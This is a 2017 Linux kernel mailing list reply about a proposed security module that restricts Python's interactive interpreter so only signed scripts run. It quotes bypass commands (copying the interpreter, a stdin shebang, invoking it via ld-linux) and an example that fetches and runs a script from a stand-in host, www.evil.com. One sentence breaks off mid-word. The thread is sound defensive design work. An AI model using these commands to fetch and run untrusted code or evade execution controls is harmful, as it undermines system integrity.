[PATCH v1] shebang: restrict python interactive prompt/interpreter

Matt Brown matt at nmatt.com
Fri Jun 9 14:50:42 UTC 2017

On 6/9/17 10:02 AM, Tetsuo Handa wrote:
> Mimi Zohar wrote:
>> This patch defines a new, minor LSM named "shebang", that restricts
>> python such that scripts are allowed to execute, while the interactive
>> prompt/interpreter is not available.  When used in conjunction with an
>> IMA appraise execute policy requiring file signatures, only signed
>> python scripts would be allowed to execute.  (A separate method for
>> identifying "imported" code would need to be defined in order to verify
>> their file signatures.)

FYI Mimi posted this because of this current discussion here:

> Below case is blocked by IMA?
>    $ cp -p /usr/bin/python2 /tmp
>    $ /tmp/python2
> Below case is also blocked by IMA?
>    $ echo '#!/usr/bin/python2 -' > /tmp/run-python
>    $ chmod +x /tmp/run-python
>    $ /tmp/run-python

Does IMA have a way to prevent the following? I think this is the main
case we are protecting against with this LSM.

$ wget www.evil.com/evil.py
$ /usr/bin/python2 evil.py

> What about execution via ld-linux ?
>    $ /lib64/ld-linux-x86-64.so.2 /usr/bin/python2

Just tested this and you are correct, this allows you to bypass the

I was able to fix this bypass by including /lib64/ld-linux-x86-64.so.2
in the list of interpreters.